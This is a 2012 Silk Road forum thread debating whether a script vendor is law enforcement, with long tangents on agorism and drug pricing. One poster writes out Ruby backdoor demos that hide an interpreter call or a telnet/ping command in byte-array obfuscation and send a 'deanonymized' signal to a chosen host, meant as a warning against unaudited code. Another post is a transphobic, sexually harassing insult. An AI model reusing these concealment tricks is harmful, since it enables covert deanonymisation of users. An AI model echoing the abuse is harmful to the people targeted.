Money, money, everywhere but none of it with any value. I think that it essentially comes down to the one's view of the difference between 'amount' and 'value'. Personally I would much rather have complete and sovereign freedom, to exist completely free as is my natural right, to any amount of anything. I value my freedom more than I value money, for what is money but a chain with which we are enslaved.

We are all born free, but we are not born into a free world.

/ teary-eyed insight

- grahamgreene
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: grahamgreene on September 07, 2012, 09:00 pm
Your agorism is nonsense.

Instead of stating your belief, why not back up your argument? Your reply is akin to me stating "YOU'RE nonsense." It has no value, adds nothing to your argument and the only thing it achieves is making you out to look rather uneducated, which I'm sure was not your intention..  ???

the markets (i.e. the buyers) dictate the prices

Correct! The number of imprisoned buyers dictate the prices. Your drugs wouldn't cost more than useless junk if they were legal. The more people are in jail, the more risky the whole enterprise is, the bigger the prices. Want a principle? Here it is: May you die today so that I die tomorrow.

Incorrect. Supply and demand dictates the prices, which itself is dictated by the prices that buyers are willing to pay. Your argument is invalid as legal drugs also command relatively high prices - pharmaceutical companies, in particular, charge outrageously high prices for their drugs; drugs which are legal, and cost mere pennies to produce, making the companies vast sums of money after the research and development costs have been satisfied. I will also ask you to note that I state "the markets (i.e. the buyers) dictate the prices", not "the number of imprisoned buyers dictate the prices." The latter doesn't really make sense as you go on to state that "the more people are in jail, the more risky the whole enterprise is, the bigger the prices."
First you say that imprisoned buyers dictate price, then you directly contradict yourself by saying that imprisoned suppliers (i.e. the ones taking the risk) in jail, the higher the price. Which is it? I'm genuinely confused about where you're getting your information...  ???

Riskier enterprise =/= "the bigger the prices." The prices are dictated by what the buyer is willing to pay for them. Sure, prices are jacked up as the risk increases, but that does not mean that people have to pay those prices. If they choose not to then the price will drop, demonstrating that the market dictates the prices, not the supplier.

As for:
Quote
Want a principle? Here it is: May you die today so that I die tomorrow.

That literally has NOTHING to do with the current debate. If I'm mistaken please do enlighten me, but what has that got to do with either agorism or capitalism?
What you have stated is basically just a principle of self-preservation in quote form. It is entirely out of place here, and contributes nothing to your argument.

Again I'll ask:
... do you even know what agorism is?  ???
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: grahamgreene on September 08, 2012, 12:05 am
Instead of stating your belief, why not back up your argument? Your reply is akin to me stating "YOU'RE nonsense." It has no value, adds nothing to your argument and the only thing it achieves is making you out to look rather uneducated, which I'm sure was not your intention..  ???

It applies not only to agorism, but to the biggest part of your second post, as I was not talking neither about legal drugs, nor contradicted myself telling that LE imprisons suppliers only... Got used, if anyone disagrees with them, he is uneducated.

I'm sorry but what you've just posted makes absolutely no sense. I genuinely can't understand what you're trying to say here. 0.2 BTC for anyone that can translate it into English.  :-\ I'll attempt to reply to the parts that do have a semblance of sense to them.

"Your agorism is nonsense" was your response to my first post. Seeing as you are reiterating that point, I'll again ask you to demonstrate how my "agorism is nonsense", and again ask you to back up your statement in some way.
Once again, stating "your agorism is nonsense" is akin to me stating "You are nonsense." It is entirely nonsensical. If you can't explain the reasoning behind your arguments then it is absolutely pointless debating anything with you.  ???

It applies not only to agorism, but to the biggest part of your second post, as I was not talking neither about legal drugs...

I know that you weren't talking about legal drugs but if you re-read your post you will see that you stated:

Your agorism is nonsense.

Correct! The number of imprisoned buyers dictate the prices. ***Your drugs wouldn't cost more than useless junk if they were legal.*** The more people are in jail, the more risky the whole enterprise is, the bigger the prices. Want a principle? Here it is: May you die today so that I die tomorrow.

I rebutted your statement by showing that drugs DO still cost more than useless junk when they are legal.

Your argument is invalid as legal drugs also command relatively high prices - pharmaceutical companies, in particular, charge outrageously high prices for their drugs; drugs which are legal, and cost mere pennies to produce, making the companies vast sums of money after the research and development costs have been satisfied.

Riskier enterprise =/= "the bigger the prices." The prices are dictated by what the buyer is willing to pay for them. Sure, prices are jacked up as the risk increases, but that does not mean that people have to pay those prices. If they choose not to then the price will drop, demonstrating that the market dictates the prices, not the supplier.

I will also add that pharmaceuticals is a virtually risk-free industry, or in the case of a single company, a virtually risk-free enterprise; therefore if we use your logic it would stand to reason that their drugs, which are legal, would cost the same as "useless junk". They do not, which invalidates your argument.

... nor contradicted myself telling that LE imprisons suppliers only...

You did indeed contradict yourself, though not in the way you seem to think I am stating. I did not state that you said LE imprisons suppliers only. Did you even read my post?!  :o

The number of imprisoned buyers dictate the prices. The more people are in jail, the more risky the whole enterprise is, the bigger the prices.

You stated that the number of buyers that are in jail dictate the prices. You then stated "the more people are in jail, the more risky the whole enterprise is, the bigger the prices." You directly contradicted yourself. How does a large amount of buyers in jail (which according to you dictates the price) increase the risk of the 'whole enterprise'?! Buyers are just buyers. They don't affect the risk profile of supplying at all. The only reason the enterprise could be considered 'riskier' is if the people being imprisoned were suppliers as the reason they would be in prison is because of the risk they're taking by supplying. Buyers going to prison does not affect the supplier's risk, ergo it does not affect the price.
Suppliers are the ones taking the risk by running 'the enterprise', thereby making the latter part of your statement apply to them, and completely contradicting the former part of your statement.

Another way to look at it is that you're stating the following: that imprisoned buyers are the ones that dictate the prices because they want to pay more money for something that has a higher risk of putting them in prison. This is absurd.
Your statements make no sense. Literally, no sense at all.

As for:
Got used, if anyone disagrees with them, he is uneducated.

Another 0.2 BTC reward for anyone that can figure out the meaning behind that. I'm going to hazard a guess and say that English isn't your first language? If it's not, let me know and I'll attempt to make my future replies a little simpler.

Want a principle? Here it is: May you die today so that I die tomorrow.
What you have stated is basically just a principle of self-preservation in quote form. It is entirely out of place here, and contributes nothing to your argument.

What I have stated is what you, agorists, have adopted so easily. Price is high because of the only one reason: risk. And the more people are convicted, the bigger risks are.

Are you stating that agorists have adopted the principles of self-preservation? By virtue of being a living creature, everyone and everything, agorist or otherwise, lives by that same principle. Humans, while we do express compassion, essentially have self-preservation hardwired in our brains as our number one priority. The drive to stay alive.
Your statement has nothing to do with agorism and everything to do with being alive. The two, whilst not mutually exclusive, are certainly not the same.

Price is not high because of one reason, it is high for a number of reasons, yes, one of them being risk. However, the argument that I am making is that prices are dictated by the markets. If I have a kilo of cocaine that I have to personally swim through shark infested waters in order to sell, and my competitor has a kilo of the exact same cocaine that was flown in, I can charge ten times more for it than my competitor because there was a lot more risk for me. However, I won't sell it, because nobody will pay for it based on risk. People will pay what they think it is worth, or else they won't buy it and will go to my competitor who is advertising lower prices. If they feel his prices are too high, they will go to another competitor, and if they're still dissatisfied with prices, they can import it themselves and charge a significantly lower price for it.

Yes, risk is a FACTOR in prices charged by sellers, but what dictates the price is what the buyer is willing to pay for it. If the market is not willing to pay €50,000 for a kilo of cocaine, then it won't sell. If an enterprising individual comes along and decides to charge €25,000 by reducing their profit margin by 60 - 70%, then that will sell as it is better value than the €50,000 offering. If a coca grower and processor comes along and decides to sell a kilo of cocaine for €5,000, then it is incredibly likely that that will be snapped up, leaving the €25,000 and €50,000 sellers unable to sell their product as BUYERS will no longer pay those prices for it.

Quote
Again I'll ask:
... do you even know what agorism is?  ???

Go on! Go on! I'm already applauding here!

I presume you're applauding because you think I'm going to write out a long description of what agorism is, only to be met with a 3 sentence reply from you that makes absolutely no sense and isn't backed up by any logic whatsoever.
So, to reiterate: I asked you if "you even know what agorism is?" - if you are unable to answer that question, all you have to do is say 'no'.

- grahamgreene
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: foxtrot77 on September 08, 2012, 03:38 am
Pine owes an apology to Louis, and the community for creating this hysteria.

Post a timestamped pic of your vagina, Pine, or stop claiming to be female. You fucking tranny LE PGP harvester.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: grahamgreene on September 08, 2012, 05:19 am
How does a large amount of buyers in jail (which according to you dictates the price) increase the risk of the 'whole enterprise'?! Buyers are just buyers. They don't affect the risk profile of supplying at all.

Thanks to the caring government, illegal drug trade is very profitable. Any attempts to regulate the market and make jail sentences longer, both for sellers and buyers, increase the fees. Karl Marx once wrote that for a 300% profit there is no crime a capitalist would not commit. Especially when victims ask for the crime to commit over and over again.

Yes, risk is a FACTOR in prices charged by sellers, but what dictates the price is what the buyer is willing to pay for it.

And if the buyer cannot pay huge prices charged by sellers, he will be told, "If you don't like it, go away." I think I heard it already. None of the sellers in their right mind would reduce their profit taking risks into account. If the buyer is addicted, he will just sell drugs. And that would be not the worst outcome. He could kill anybody to get money, for example. If the buyer can pay huge prices, the buyer will be willing to pay huge prices for the drugs delivered safely, in lieu of buying cheap alternatives and spending his life in prison.

Another way to look at it is that you're stating the following: that imprisoned buyers are the ones that dictate the prices because they want to pay more money for something that has a higher risk of putting them in prison. This is absurd.

Not putting them in prison. Keeping them out of prison.

These are the regulation mechanisms, which you and other commoners substitute with agorism.

Quote
Go on! Go on! I'm already applauding here!

I presume you're applauding because you think I'm going to write out a long description of what agorism is, only to be met with a 3 sentence reply from you that makes absolutely no sense and isn't backed up by any logic whatsoever.

You misunderstood me. :D

Another 0.2 BTC reward for anyone that can figure out the meaning behind that. I'm going to hazard a guess and say that English isn't your first language?

go talk to yourself. I have zero tolerance to imbeciles.

You can't answer the simple question that spurred this entire debate, you show a clear lack of understanding of any of the concepts we've been trying to discuss, and you throw an insult at me simply because you don't wish to debate the issue any further. Nice.

For the record, when I asked if English was your first language it was a genuine question. Your grammar and your inability to grasp concepts that I have explained at length would suggest you're not 'getting' everything due to not understanding every word I used, so I assumed English isn't your native language; hence my offer to strip my posts down a little if that were the case. I was just trying to be helpful, but apparently that makes me an imbecile.
You, sir or madame, are an absolute gem.  ::)

If you'd like to discuss the issues further, please feel free to PM me. I'm genuinely interested in the bizarre logic that you're employing to arrive at your conclusions over the last few posts and would like the chance to break things down, if possible.

- grahamgreene
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 08, 2012, 10:07 am


Quote
I can also completely understand pine's insistence that the code be released and checked before it is implemented by anyone; this is good security practice, but the fact that this is a product that is for sale by a registered vendor on an agorist marketplace makes this request more than a little unreasonable.

I strongly identify with Agorism, but one common theme I notice in many people who identify as such is that they let their ideological insistence on free markets and profit cloud their thinking. I actually notice this strongly when it comes to security software in particular. In many cases the best security and anonymity solutions are inherently free. Look at Tor and then look at any VPN. Tor works because volunteers donate their resources to a collective of people who are free to use them without any pay. Although it is not strictly speaking communistic due to the fact that nobody is forced to donate resources, it strikes me as having a more communist based ideology behind it than a paid VPN does. The fact that thousands of people volunteer their resources at little to no benefit for themselves allows Tor to be extremely good at providing low latency anonymity. I see a lot of Agorists who are actually not very fond of Tor and highly favor VPNs  (probably in part due to the fact that they sell access to VPNs and are pissed off that Tor offers better anonymity than they can in addition to being free). They are also highly focused on creating pay anonymity networks where every byte you transmit comes at a cost that is paid to the node operators who relay for you. Now I have nothing against people being paid for their resources, but from a security point of view I cringe at the idea of adding an entire unnecessary financial payment topology to an anonymity network. Now you need to anonymize the network traffic and the payment for the network traffic.

So Agorism is awesome and profiting from your work is awesome, but some things just do not mix well with profit unless you are extremely careful with how you go about it. You can donate cash to the Tor project and even to individual node operators in many cases. They do not make you pay to use their resources though. Truecrypt does not make you pay to use it, the source code is open and it is freely available for anyone to download and audit. At the same time they accept donations and make thousands of dollars. Not as much as the people making closed source proprietary encryption software make, but then again we can be more confident when we use their solution than we can be when we use the solutions from their strictly for profit competitors. Look at FileVault and VileFault for example.

Quote
Yes, warn vendors to go through the code with a fine-tooth comb should they purchase this item, but that's something that they should be doing anyway with anything that could potentially compromise them. It would do no harm to anyone to post this recommendation, but your statement will likely harm LouisCyphre's business prospects and damage his good reputation in the community. This is essentially slander.

We should not put the financial interests of vendors here above the security of everyone else. Vendors who purchase this code are not going to go through it with a fine tooth comb because if they knew enough to do that then they would simply make the program themselves. We need to be practical when we think of situations like these, sure it is possible to run this code completely isolated and be one hundred percent safe. Are people going to actually do this? Probably not. It is almost a strawman to give arguments like this, because in reality the people who would purchase this are not going to isolate it they are not going to audit it etc. Even if the code is one hundred percent non-malicious it doesn't matter because if we don't point out that people should not buy restricted access software from Louis then we have no right to point out that people should not use restricted access software that is offered through SR (or anywhere else) at all. It has nothing to do with Louis as an individual or a vendor, it has to do with best security practices, and the best practice for security would be to not run scripts that 99% of people on the forum are never going to look at, especially when the 1% of people who will pay for them are certainly going to be the people who do not have the skills to audit them.


Quote
Declaring LouisCyphre as "our resident LE Agent" is incredibly rash of you pine, and defamatory in the extreme; in the interest of fairness I would ask that the thread title be amended to reflect the fact that there is absolutely no evidence to back up this accusation.

A fair enough point.

Quote
You may assert that because he won't release the source code that he must be LE, or malicious in the extreme, but there is absolutely no logic in that at all. He's a creator of a digital item that he wishes to sell on an agorist marketplace, to anybody who wishes to buy it. He is allowed to do that, and has a right to do it without prejudice.
Asserting that he has malicious intent before you've seen the code is outrageous. Whilst I can see where you're coming from and how you arrived at the conclusion that you did, if you feel there is something malicious in what LouisCyphre is offering you are free to purchase it and review the code yourself for peace of mind - just like anybody else.

It is not particularly outrageous. If someone here suggests that we all stop using Tor and start using their for profit VPN, I will be the first to claim that the person is likely a law enforcement agent, Agorism and individual profit be damned.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 08, 2012, 10:30 am

And no. So long as the scripts themselves are not ridiculous mountains of tortured spaghetti code (in which case no-one should run it on general principle), there will be no room full of NSA spooks required to vet the code thoroughly. It will be relatively brief. Either it makes network connections, or it doesn't. Either it does unexpected IO, or it doesn't.


You might be able to have it so that you encrypt code that does networking with GPG and have a special header for it, and in the code that is distributed have it (obfuscated of course, which would probably be caught in an audit) take the message that is decrypted from the ciphertext and run it as a script if the header is detected. Then you could completely hide any networking calls and have the code distributed look a lot more legit, although there would still be a switch that is looking for a special signal and of course the code that then runs whatever is decrypted as a script. Not a foolproof plan by any means, but it would possibly be easier to hide this than my original post of a ruby method that does networking while obfuscating IP address and port and obfuscated require of sockets, (although not the fact that TCP is being used). Still nothing that wouldn't be noticed, but to notice such a thing you would really need to know the language and again if you know the language why are you using a simple script someone else made.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 08, 2012, 10:34 am
Quote
No, that's just your opinion.  You want me to adhere to your definition of what Silk Road should be rather than what it actually is.

No actually I don't give a shit what you do, but I will let people know that unless you adhere to my idea of what is secure that they should not use or pay for your software.

Quote
I've said my product is a particular thing, which runs in a certain way and is not a threat.  You (and Pine) say otherwise.  If people agree with you or are just not interested in the product then they won't buy it.  If people don't agree with you and are interested in the product then they might buy it.

I never said otherwise. I merely said the potential exists, and then explained how this potential can be greatly reduced. I am merely warning the people who may buy your product, that I would not consider it to be in their best interests to do so, as things currently stand.

Quote
If people buy it and I am telling the truth then that will be reported to the forum and, hopefully, I will have more sales.  If people buy it and it turns out I've lied or the product is a threat (or just includes a bad bug that makes it a threat), then that will be revealed.  At that point I will lose all credibility, have no sales and possibly have my account terminated and be driven from the site.

Except nobody who buys a simple python script like this is going to have the slightest clue if you are telling the truth or not.

Quote
If you really want to prove me wrong then buy SROPPy and post the code.  I'm willing to bet you don't do that.

Why would I buy something that I could make myself in about ten minutes with Ruby?

PS here is a neat link that talks about interpreted/compiled and handily discusses ruby and python. http://programmers.stackexchange.com/questions/24558/is-python-interpreted-or-compiled 
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Limetless on September 08, 2012, 10:38 am
lim lim limmy...

it's actually what hinders it.

though it certainly has its awesome points. just simply not the best a human existence can do. for capitalism to thrive, problems have to exist and continue to exist. ever seen the storyofstuff.com? or storyofbottledwater? this is a system for conventionals... cyclical consumption and planned obsolescence is what drives the magic capitalistic circle of consumption and infinite growth and profit. except the resources that make it all happen are not infinite. sorry for the derail. back on track back on track... wasn't cypher from the matrix uhh.....?

i think the system is great. as a transitioning one.

We shall have to agree to disagree my friend. :)

Anyway to the original point, can anyone confirm that the person is 110% Bent or not because I've had messages from both sides asking me to step in now so conclusions would be nice.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 08, 2012, 10:53 am
Quote
I was a staunch capitalist for many years Limetless - I was pro-regulation, pro-market manipulation, pro-government and essentially pro-fascist given the nature of the beasts that I supported. With capitalism comes regulation and government intrusion. Indeed capitalism by its very regulatory nature is what powers the governments of today, and with them, their restrictive laws. Don't get me wrong, I like making money hand over fist as much as the next guy but that is only because we currently live within the confines of a capitalist society.

What a crock of shit. Agorism is extremely anti government. Agorists do not recognize the legitimacy of any government, or even of nations separated by borders. They are extremely against regulation. Even people who are anti-capitalist generally accuse capitalists of being anti-regulation, claiming that government regulations protect the people from the evil capitalists who only care about money and not the well being of the people, so I don't see where you get capitalism is pro regulation from. The USA is not a capitalist country, if that is where you happen to live. The USA merely claims to be a capitalist country. It is really quite a fascist country, although currently the democrat politicians masquerade as socialist to get support from the public which is largely in favor of socialism. Agorism is about as anti-regulation anti-government anti-fascist as you can get, although it is perfectly fine with market manipulation and monopolies and such.

Quote
Capitalism is the reason that marijuana and most other drugs aren't restricted. Marijuana's prohibition in particular was the result of corrupt capitalism and the power that pharmaceutical companies who lobby politicians to keep legalisation off the agenda also exists as a symptom of the capitalist condition.

No most of those drugs are restricted, maybe that is what you meant to say? And it is because of fascism not capitalism. Silk road is a great example of Agorism. The primary theory of Agorism is that private security agencies will rise up, funded by black market activity (such as drug trafficking), and will eventually become powerful enough to totally protect their customers from the state, eventually leading to the death of the state and government. That is Agorism in a nutshell, not banning drugs and regulating things lol.

Quote
Money, money, everywhere but none of it with any value. I think that it essentially comes down to the one's view of the difference between 'amount' and 'value'. Personally I would much rather have complete and sovereign freedom, to exist completely free as is my natural right, to any amount of anything. I value my freedom more than I value money, for what is money but a chain with which we are enslaved.

Most Agorists are very pro-gold and against fiat currency, although bitcoin is of course insanely popular with them as well.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Limetless on September 08, 2012, 10:56 am
So no answer to my question then?
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 08, 2012, 12:18 pm
try this on for size.....

the actual program I would maliciously distribute would be a bit bigger (to actually serve a purpose other than to demonstrate a clever backdoor) but would have this in it ...

Quote
#opens the file with your GPG message in it
file = File.open("test", "r") 
message = ""

#reads the file line by line and adds each line to the string variable message
while line = file.gets
message << line
end

#decrypts your message and stores the plaintext as decrypted_message
decrypted_message = `echo "#{message}" | gpg -d`

#if the message is encrypted with the gpg-privacy toolkit we need to
#issue a special command or else it will fail because of the way
#that program encodes the messages. If a normal GPG client
#was used to encrypt the message, we don't need to do any
#special formatting though.

if decrypted_message.include?("gpg-privacy-toolkit")
 puts `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`
else
 puts `echo "#{decrypted_message}"`
end

let's see now...how about this as a message to encrypt to the unsuspecting vendor

Quote

#gpg-privacy-toolkit
require 'socket' ; sucks_to_be_you = TCPServer.open('11.11.11.11', '80') ; sucks_to_be_you.send('deanonymized', 0)

the ciphertext looks like this

Quote
-----BEGIN PGP MESSAGE-----
Version: GnuPG v1.4.11 (GNU/Linux)
-----END PGP MESSAGE-----


hopefully nobody decrypts my message!!!
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Limetless on September 08, 2012, 12:36 pm
And this means....
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: holyfuckisuck2 on September 08, 2012, 01:05 pm
OK, I deleted my other account's password because I realized that I don't want to spend my time posting on an internet forum but I just wanted to say that I pretty much completely agree with everything that kmf posted on this and the last page.  When I tried to tell louis not to pointlessly bring up political philosophy I was worried about exactly what has happened on the last few pages:  completely pointless tangents based around agorism etc that have absolutely nothing to do with the software or anything else.  Luckily, unlike everyone else, kmf cut right to the point pretty much.  In the end you just can't trust completely unaudited etc software from an anonymous person on the internet.  All of his posts about how it's against agorism not to let him sell and that he could supposedly easily do things more easily with jpgs really don't answer that point at all imo.

I really wish guru would voice his opinion though as his posts always make sense to me. 

I actually feel like indulging in these off topic posts a bit though ironically.  I have a couple of questions about agorism/free market anarchism/whatever that I'd like answered although all of this is off topic.

On the topic of market run police how could a market regulate prison sentencing?  Say a murderer is caught, what would be done with him and who would decide that?

On the topic of anarchist free market capitalism.  I've thought a lot about the end goal of any form of government that governs the human race and I think that one of the end goals is that no human being should have absolute power over the basic rights of another human being at any time.  However, if the government was abolished then I don't think that that would actually do that job.  I think that, as our USA government is pretty much corporation run now, that if anarchism was brought about these corporations would lose none of their power and we'd pretty much be left in the same situation we're in now only without politicians and a government as middlemen.

So wouldn't there be just as much potential for tyranny from the extremely rich and powerful as there would from the government in the first place?  It seems to me that in an anarcho-capitalist society there would still be just as many extremely powerful people who have power over the rights of other people, and that they just wouldn't be in "official" positions.  There would still be a vast difference in rights between the rich and everyone else.  To me that's not true human equality.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 08, 2012, 01:10 pm
it means that it doesn't matter if there is no networking code in the distributed program, if there is code in the distributed program that launches whatever it decrypts as a script, provided it has a magic keyword in it ;). The entire code distributed has no hint of networking being done because it gets that from the plaintext after it decrypts the message.

if decrypted_message.include?("gpg-privacy-toolkit")
   `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`
end

checks the plaintext for the string "gpg-privacy-toolkit" and if it finds it then the entire plaintext is launched as a ruby script.


edit: here I improved it a little bit, now it actually outputs the decrypted message but if it has the 'magic' string in it then it sends packets to 11.11.11.11:80 (around Tor of course, unless you have taken configuration measures around this, like transparent proxy, firewall rules to drop traffic, isolated it somehow, etc etc).

Quote
if decrypted_message.include?("gpg-privacy-toolkit")
 puts `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`
else
 puts `echo "#{decrypted_message}"`
end

The only difference between a legitimate program for decrypting messages and showing the plaintext and a malicious program that could deanonymize you boils down to 

| #{[105, 114, 98].pack("c*")}

Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Limetless on September 08, 2012, 01:23 pm
And how does this relate to the person being accused.....
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 08, 2012, 01:27 pm
And how does this relate to the person being accused.....

it shows that it is fucking stupid to use a script from ANYONE here if it isn't publicly audited, especially if you don't know the language well enough to recognize  | #{[105, 114, 98].pack("c*")}  is all that it takes to fuck you, which will consist of 100% of people who buy the script from Louis.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Limetless on September 08, 2012, 01:29 pm
And thus LouisCyphre is.....?
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 08, 2012, 01:54 pm
And thus LouisCyphre is.....?

Engaged in a business model that should not be sustainable on a forum that has members who value security?
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 08, 2012, 02:23 pm
Quote
It seems to me that in an anarcho-capitalist society there would still be just as many extremely powerful people who have power over the rights of other people, and that they just wouldn't be in "official" positions.  There would still be a vast difference in rights between the rich and everyone else.  To me that's not true human equality.

Agorism is not magic and there will always be people who try to unfairly control others. As an extreme analogy: No matter how many men desire to, or how righteous their desire is, they can never stop an omnipotent being from doing as it pleases with them. No political ideology or popular support could change such a scenario. Agorism itself is largely tied to the non-aggression principle, people should be free to do what they please so long as they do not infringe on the freedom of others. Anyone who infringes on the freedom of others is seen as a threat and attempts will be made to stop them, generally via private defense agencies. The rich and powerful could have their own agencies that try to allow them to do whatever they please, that is simply a fact of reality and nothing can change it. However nobody says that they will win. Look at the powerful agencies such as FBI and DEA, it appears as if they have been stripped of their power to oppress by a single man using open source software. Good and evil will always fight but thankfully there is nothing to stop good from winning many battles in what is likely to be a never ending war.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: JSB on September 08, 2012, 02:34 pm
Hmm, Interesting discussion.  Kmfkewm if that's your idea of a fight involving good and evil and you think of that as a valid argument then you're clearly not looking at the obvious fact.  You say that open source software has given us the ability to get the better of the dea or the fbi but that's simply not true.  In this reality "evil" is winning by a landslide and there is no end in sight.  If the government magically disappeared it would be the same.  You think poor and middle class people would have the resources to counter "private defense agencies" of the rich?  They couldn't.  Sure maybe we have avoided losing our internet rights with open source software and can even order drugs with little risk now, but that has little to do with real life where the dea and the fbi imprison people every day and the people with money have the power to infringe on your rights.  right now it's the government with armies and police forces and in anarchy it would be corporations with "private defense agencies."  What's the difference? 
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 08, 2012, 02:35 pm
I just realized I was being far too complicated with my backdoor. How about this.

Quote
#opens the file with your GPG message in it
file = File.open("test", "r")
message = ""

#reads the file line by line and adds each line to the string variable message
while line = file.gets
message << line
end

#decrypts your message and stores the plaintext as decrypted_message
decrypted_message = `echo "#{message}" | gpg -d`

#prints the decrypted message to the screen
puts `echo "#{decrypted_message}"`
`#{[116, 101, 108, 110, 101, 116, 32, 49, 50, 55, 46, 48, 46, 48, 46, 49, 32, 56, 49, 49, 56].pack("c*")}`

On the negative side it now has an even bigger string of inexplicable numbers, on the positive side no matter what message the user gets it telnets to whatever server I would like it to go to and the message doesn't need to include ruby code at all. Hmm I bet I can think of an even more sneaky way to get IP addresses.....this is kind of fun. 

hm ping has less numbers `#{[112, 105, 110, 103, 32, 108, 46, 116, 118].pack("c*")}`
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 08, 2012, 03:22 pm
Hmm, Interesting discussion.  Kmfkewm if that's your idea of a fight involving good and evil and you think of that as a valid argument then you're clearly not looking at the obvious fact.  You say that open source software has given us the ability to get the better of the dea or the fbi but that's simply not true.  In this reality "evil" is winning by a landslide and there is no end in sight.  If the government magically disappeared it would be the same.  You think poor and middle class people would have the resources to counter "private defense agencies" of the rich?  They couldn't.  Sure maybe we have avoided losing our internet rights with open source software and can even order drugs with little risk now, but that has little to do with real life where the dea and the fbi imprison people every day and the people with money have the power to infringe on your rights.  right now it's the government with armies and police forces and in anarchy it would be corporations with "private defense agencies."  What's the difference?

Is it not true that bullet proof vests protect us from bullets even if people who shoot themselves in the head continue to die?   
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Limetless on September 08, 2012, 04:28 pm
Ah Guru you are such a breath of fresh air man. You I like a Smint at the north pole whilst standing the north with wearing slightly damp pants.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 08, 2012, 05:13 pm
Quote
As such, Louis has the right to market his wares under any conditions that he deems fit.

Nobody really argued that he should be banned from selling it, we are just warning people that it is dumb if they buy it unless the source code is publicly available for all to audit. The type of people who will buy something like this are inherently people who do not know how to properly audit it.


Quote
Frankly, what I see here is that Louis appears to be being held to a higher standard than other vendors here on Silk Road.

If a vendor is selling MDMA tablets that are of a press known to frequently contain PMA then is it wrong for us to bring this up? No. He is being held to the same standard as any other vendor, reviews are being left on his product. If someone sells PMA we don't need to try it to leave a review saying that it is dangerous, do we?

Quote
As almost everyone who knows me on here is aware, I'm not a drug user. Let's put that aside for a moment, and assume that this is not the case -- let's assume for a moment, for the purpose of argument, that I have decided to purchase a quantity of heroin. Now, how do I know that the heroin I purchase from a vendor on here has not been cut with Drano or rat poison? I don't.

It is wrong to say that his product IS backdoored. It is wrong to say a vendor's product has been cut with Drano if you have not purchased some and tested it. It is not wrong to say that PMA is dangerous if a vendor is selling PMA.


Quote
I don't see DPR mandating that all drug vendors must have their wares laboratory-tested prior to sale, to prove their purity, and to prove that they were not contaminated/adulterated with harmful chemicals.

It wouldn't be a bad idea but the implementation details are a bit difficult. There are labs in NL that legally test drugs and return such data, maybe we could work something out with them. The hardest part is making it so vendors do not know who the people doing tests are. And having a single person who does tests illegally in countries where it is not allowed will clearly not work. It would at least be nice if we had certifications a vendor can obtain through some private service here that randomly buys drugs from vendors to be shipped to new addresses for quality control. Mandated? Of course not. An extra service for harm reduction....yes.

Quote
I also haven't seen Pine (or anyone else) pillory the vendors of the various USB-stick-based anonymity solutions that are being hawked on Silk Road.

Really? I have called several of them 'potential feds'. I wouldn't be caught dead ordering a USB stick based anonymity solution from a vendor here. These techniques are literally straight out of fed 101.

Quote
So, again, why is Louis being held to a higher standard than everyone else? Why is he being asked to prove the safety of his product, when every other vendor on Silk Road is not?

Because his product could lead to vendors being busted and then customers being busted? But he has no obligation to be responsible with his programs, just as we have no responsibility to say we think his behaviors are anything other than sketchy.

Quote
I don't trust Louis' software -- I wouldn't touch it with a barge-pole. I also wouldn't trust software written by Pine, kmfkewm, Shannon or even DPR themselves for that matter, unless I had thoroughly vetted it first.

You should learn C because I am going to release some nice stuff soon :). Also have it in Ruby nearly done but that is just for prototyping.

Quote
Louis is absolutely right -- he has the right to sell his software, and people have the right to buy it -- or not -- as they see fit.

Sure enough and we have the right to leave reviews saying that we find it sketchy and warning the poor souls who might otherwise think it is safe to privately obtain scripts from people on SR to help aid them in their drug trafficking careers.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: holyfuckisuck2 on September 08, 2012, 05:28 pm
Well, on a theoretical level I think that everything you said makes sense guru, but on the other hand I feel that your comparison between asking a drug seller to prove their wares and asking a programmer to prove that their software is safe.

The difference is as follows:

1.  It's impossible for a drug seller to really prove that they'll always be shipping something safe.  It's a lot easier for a programmer to prove that their program is safe by releasing it open source etc.
2.  If a drug dealer ships something unsafe then 1 person has a bad reaction.  If louis widely gives out malware specifically targeting vendors and information regarding their vending then that's a major blow to silk road itself.
3.  It's usually possible for a user of drugs to get a reagent test and test their drugs.  It's not possible for a prospective user of software to suddenly learn programming and test a program.

Of course like kmf just posted I'm not disagreeing with any of your main points I just think it's an inaccurate comparison.  I also still think that agorism has nothing to do with whether it's a security risk or not which is the only point that anyone has brought up, but it doesn't really matter.

